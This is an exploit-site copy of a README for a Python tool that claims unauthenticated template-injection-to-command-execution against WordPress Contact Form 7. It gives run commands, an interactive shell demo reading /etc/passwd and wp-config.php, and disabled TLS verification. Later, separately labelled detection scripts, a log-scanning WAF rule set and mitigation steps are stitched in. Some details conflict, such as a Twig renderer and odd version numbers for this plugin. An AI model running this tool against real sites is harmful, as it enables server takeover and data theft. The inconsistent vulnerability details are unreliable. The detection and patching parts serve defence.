## https://sploitus.com/exploit?id=12BCB450-9365-5457-BD3E-61E9AFB1F9B5
# WordPress - Contact Form 7 - Unauthenticated SSTI to Remote Command Execution
[MIT License](https://opensource.org/licenses/MIT) · [Python 3](https://www.python.org/downloads/) · [GitHub repository](https://github.com/0xgh057r3c0n/CVE-2026-4257) · [WordPress](https://wordpress.org/)
**CVE-2026-4257** is a critical Server-Side Template Injection (SSTI) vulnerability in Contact Form 7 versions up to and including 1.7.36 that lets unauthenticated remote attackers execute arbitrary system commands on the web server.
## Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2026-4257 |
| **Affected Software** | Contact Form 7 ≤ 1.7.36 |
| **Vulnerability Type** | Server-Side Template Injection (SSTI) |
| **Impact** | Remote Command Execution (RCE) |
| **Attack Vector** | HTTP GET request with crafted parameters |
| **Authentication** | Not required |
| **CVSS Score** | 9.8 (Critical) |
The vulnerability lies in the plugin's Twig template rendering: input from form fields is not sanitized before it reaches the renderer, so an attacker can submit Twig syntax in a field and have the server evaluate it as template code.
## Features
- Automatic version detection - Identifies vulnerable Contact Form 7 installations
- Field auto-detection - Automatically discovers form fields for exploitation
- Interactive shell - Fully featured command shell for persistent access
- Base64 payload encoding - Bypasses character restrictions
- Colored output - Enhanced readability with optional color support
- Verbose mode - Detailed debugging information
- SSL bypass - SSL certificate verification disabled by default
- Single command mode - Execute individual commands quickly
## Installation
```bash
git clone https://github.com/0xgh057r3c0n/CVE-2026-4257.git
cd CVE-2026-4257
```
### Dependencies
Install the required Python packages manually:
```bash
pip3 install requests
pip3 install urllib3
```
Or install both at once:
```bash
pip3 install requests urllib3
```
## Usage
### Basic Syntax
```bash
python3 CVE-2026-4257.py [options] <url> [payload]
```
### Quick Start Examples
```bash
# Check if target is vulnerable
python3 CVE-2026-4257.py http://target.com/contact/
# Execute a single command
python3 CVE-2026-4257.py http://target.com/contact/ "id"
# Interactive shell mode
python3 CVE-2026-4257.py -i http://target.com/contact/
# With verbose output
python3 CVE-2026-4257.py -v http://target.com/contact/ "whoami"
# Specify custom form field
python3 CVE-2026-4257.py --field email http://target.com/contact/ "ls -la"
```
## Interactive Shell
The interactive shell provides a persistent command execution environment with additional features.
### Starting Interactive Shell
```bash
python3 CVE-2026-4257.py -i http://target.com/contact/
```
### Shell Commands
| Command | Description |
|---------|-------------|
| `<command>` | Execute a system command directly |
| `shell <command>` | Execute a system command |
| `set_field <field>` | Change the form field used for injection |
| `show_info` | Display target information |
| `detect_fields` | Detect available form fields |
| `clear` | Clear the screen |
| `help` | Show help menu |
| `exit` / `quit` | Exit the shell |
### Interactive Shell Demo
```bash
┌──[CVE-2026-4257@0xgh057r3c0n]─[~]
└──╼ $ whoami
www-data
┌──[CVE-2026-4257@0xgh057r3c0n]─[~]
└──╼ $ ls -la
total 48
drwxr-xr-x 5 www-data www-data 4096 Oct 15 10:30 .
drwxr-xr-x 3 www-data www-data 4096 Oct 15 10:30 ..
-rw-r--r-- 1 www-data www-data 123 Oct 15 10:30 wp-config.php
┌──[CVE-2026-4257@0xgh057r3c0n]─[~]
└──╼ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
┌──[CVE-2026-4257@0xgh057r3c0n]─[~]
└──╼ $ set_field your-email
[*] Field changed to: your-email
```
## Options
| Option | Description |
|--------|-------------|
| `url` | Target URL with vulnerable Contact Form 7 |
| `payload` | Command to execute (optional in interactive mode) |
| `--field` | Form field name to use for exploitation |
| `--interactive`, `-i` | Start interactive shell mode |
| `--verbose`, `-v` | Enable verbose output |
| `--no-color` | Disable colored output |
| `--verify-ssl` | Verify TLS certificates (off by default, so the tool accepts any certificate, including an interception proxy's; turn it on when the target's certificate is expected to validate) |
| `--help`, `-h` | Show help message |
## Detection
The exploit automatically detects:
1. **Contact Form 7 version** - Reads the plugin version from the page and compares it against the affected range (≤ 1.7.36)
2. **Form fields** - Identifies the input fields the form exposes
3. **Field selection** - Automatically selects the best field for exploitation; override it with `--field` if the automatic choice fails
### Manual Detection
You can check a target by hand by examining the page source for:
- the `suptablesui.min.css?ver=` string
- Contact Form 7 version numbers in the plugin's enqueued asset URLs (`?ver=` query strings)
- Form fields carrying `data-name` attributes
A matching version string shows exposure, not exploitability; confirm the affected range against the CVE record linked under References before triaging a hit.
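The manual checks above can be scripted against saved page source. The following is an added example, not the tool's own code: it pulls the Contact Form 7 version from the plugin's `?ver=` asset URLs, looks for the `suptablesui.min.css?ver=` marker, lists `data-name` fields, and compares the version numerically against the ≤ 1.7.36 range this README states. It assumes Contact Form 7 serves its CSS/JS from `wp-content/plugins/contact-form-7/` (the standard WordPress plugin layout) and that `data-name` sits on the form-control wrapper; the sample HTML is constructed, not captured from a real site.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Affected range as stated in this README: Contact Form 7 <= 1.7.36.
MAX_VULNERABLE_VERSION = (1, 7, 36)

# Assumption: the plugin enqueues its CSS/JS from wp-content/plugins/contact-form-7/
# with WordPress's usual ?ver=<plugin version> cache-buster on the URL.
CF7_ASSET_RE = re.compile(r"""plugins/contact-form-7/[^"'\s]*?\?ver=(\d+(?:\.\d+)*)""")
# Marker this README lists under Manual Detection.
SUPTABLES_RE = re.compile(r"suptablesui\.min\.css\?ver=")
# Form fields: the README says to look for data-name attributes.
DATA_NAME_RE = re.compile(r"""data-name=["']([^"']+)["']""")


def parse_version(text: str) -> tuple:
    """'1.7.36' -> (1, 7, 36): numeric comparison, so '1.7.4' sorts below '1.7.36'."""
    return tuple(int(p) for p in text.split("."))


@dataclass
class Assessment:
    cf7_version: Optional[str]
    has_suptables_marker: bool
    fields: List[str]

    @property
    def in_affected_range(self) -> bool:
        if self.cf7_version is None:
            return False
        return parse_version(self.cf7_version) <= MAX_VULNERABLE_VERSION


def assess_html(html: str) -> Assessment:
    """Run the README's manual checks over saved page source (works offline)."""
    m = CF7_ASSET_RE.search(html)
    version = m.group(1) if m else None
    fields = list(dict.fromkeys(DATA_NAME_RE.findall(html)))  # de-duplicate, keep order
    return Assessment(version, bool(SUPTABLES_RE.search(html)), fields)


# Constructed sample page, not captured from a real site.
SAMPLE_HTML = """
<link rel='stylesheet' id='contact-form-7-css'
      href='https://example.test/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=1.7.36' media='all' />
<link rel='stylesheet' href='https://example.test/wp-content/themes/x/suptablesui.min.css?ver=1.0' />
<form class="wpcf7-form" method="post">
  <span class="wpcf7-form-control-wrap" data-name="your-name"><input type="text" name="your-name"></span>
  <span class="wpcf7-form-control-wrap" data-name="your-email"><input type="email" name="your-email"></span>
  <span class="wpcf7-form-control-wrap" data-name="your-message"><textarea name="your-message"></textarea></span>
</form>
"""
# Same page after the update the Mitigation section recommends.
PATCHED_HTML = SAMPLE_HTML.replace("?ver=1.7.36", "?ver=1.7.37")

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("patched", PATCHED_HTML)):
        a = assess_html(page)
        print(f"{label}: version={a.cf7_version} affected={a.in_affected_range} "
              f"marker={a.has_suptables_marker} fields={a.fields}")
```

Feed it `curl -s` output of the contact page; a `None` version means the asset URL pattern was not found and the page needs a manual look rather than being treated as safe.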
## Mitigation
To protect against CVE-2026-4257:
1. **Update immediately** - Upgrade to Contact Form 7 version 1.7.37 or later
2. **Apply patches** - If you cannot update, apply the vendor's security patch for the affected version
3. **Input validation** - Never pass user-supplied strings to the template engine as template source; pass them in as variables and reject template delimiters (`{{`, `{%`) in form input
4. **WAF rules** - Deploy Web Application Firewall rules that flag template delimiters and known Twig gadgets in request parameters after URL-decoding them
5. **Least privilege** - Run PHP workers under a dedicated low-privilege account so a successful injection cannot reach beyond the web root
With WP-CLI the update is a single command:
```bash
wp plugin update contact-form-7
```
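For the WAF and detection item, here is an added example that is not part of this README or the tool: it scans Combined Log Format access-log lines for SSTI attempts. It undoes repeated percent-encoding, looks for Twig delimiters and a short list of Twig gadgets taken from public Twig SSTI write-ups (an assumed list, not this tool's payload, which the README does not publish), and re-scans base64-looking parameter values because the tool base64-encodes its payloads. The log lines are constructed, not captured.

```python
import base64
import re
from typing import Dict, List
from urllib.parse import unquote

# Generic Twig SSTI indicators. The gadget list is an assumption drawn from
# public Twig SSTI write-ups, not this tool's payload; tune it for your site.
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
TWIG_GADGETS = re.compile(
    r"_self\.env|registerUndefinedFilterCallback|callFunction|getFilter\s*\("
    r"|\|\s*filter\s*\(|\bmap\s*\(\s*['\"](?:system|exec|passthru|shell_exec|popen)['\"]",
    re.I,
)
# Runs that look like base64 (the README says the tool base64-encodes payloads).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def fully_unquote(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding; double-encoding is a common evasion."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def decoded_b64_fragments(s: str) -> List[str]:
    """Decode every base64-looking run so wrapped payloads can be re-scanned."""
    out = []
    for tok in B64_TOKEN.findall(s):
        body = tok.rstrip("=")
        try:
            out.append(base64.b64decode(body + "=" * (-len(body) % 4)).decode("utf-8", "ignore"))
        except ValueError:
            continue  # not valid base64 after all
    return out


def classify_request(path: str) -> List[str]:
    """Reasons the request path looks like an SSTI attempt; an empty list means clean."""
    decoded = fully_unquote(path)
    reasons = []
    if TEMPLATE_DELIMS.search(decoded):
        reasons.append("template-delimiters")
    if TWIG_GADGETS.search(decoded):
        reasons.append("twig-gadget")
    if any(TEMPLATE_DELIMS.search(f) or TWIG_GADGETS.search(f)
           for f in decoded_b64_fragments(decoded)):
        reasons.append("base64-wrapped-template")
    return reasons


def scan_log(lines: List[str]) -> List[Dict]:
    """Return one record per suspicious request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        ip, ts, method, path, status = m.groups()
        reasons = classify_request(path)
        if reasons:
            hits.append({"ip": ip, "time": ts, "method": method,
                         "status": int(status), "path": path, "reasons": reasons})
    return hits


# Constructed access-log lines, not captured from a real server.
_B64 = base64.b64encode(b"{{ _self.env.getFilter('id') }}").decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Oct/2025:10:30:01 +0000] "GET /contact/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Oct/2025:10:30:02 +0000] "GET /contact/?your-name=%7B%7B7*7%7D%7D HTTP/1.1" 200 5133 "-" "python-requests/2.31"',
    '203.0.113.7 - - [15/Oct/2025:10:30:03 +0000] "GET /contact/?your-email=%257B%257B_self.env%257D%257D HTTP/1.1" 200 5140 "-" "python-requests/2.31"',
    '198.51.100.4 - - [15/Oct/2025:10:31:00 +0000] "GET /contact/?your-name=Alice&your-email=alice%40example.test HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [15/Oct/2025:10:32:00 +0000] "GET /contact/?your-message={_B64} HTTP/1.1" 200 5200 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['method']} {hit['path']} -> {', '.join(hit['reasons'])}")
```

The decode-before-match order is the point: a rule that looks for `{{` in the raw request line misses both the double-encoded and the base64-wrapped attempts, and only the first, clean request from the same client would have looked normal.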
## Disclaimer
**This tool is for educational and authorized security testing purposes only.**
- ⚠️ Do not use this exploit on systems you do not own or have explicit permission to test
- ⚠️ The author is not responsible for any misuse or damage caused by this tool
- ⚠️ Always obtain proper authorization before conducting security assessments
- ⚠️ Unauthorized access to computer systems is illegal in most jurisdictions
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file in the repository for details.
## Author
**0xgh057r3c0n**
- GitHub: [@0xgh057r3c0n](https://github.com/0xgh057r3c0n)
- Discoverer of CVE-2026-4257
## Acknowledgments
- The WordPress security community
- Contact Form 7 plugin team for their response to this vulnerability
- Security researchers who contributed to SSTI exploitation techniques
## References
- [CVE-2026-4257 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-4257)
- [Contact Form 7 Official Site](https://contactform7.com/)
- [SSTI Vulnerability Guide](https://portswigger.net/web-security/server-side-template-injection)
## Support
If you find this tool useful, please consider:
- Starring the repository on GitHub
- Sharing responsibly with security professionals
- Reporting any issues or suggestions
---
**IMPORTANT:** This exploit is for authorized security testing only. Unauthorized use is illegal. Always obtain written permission before testing any system.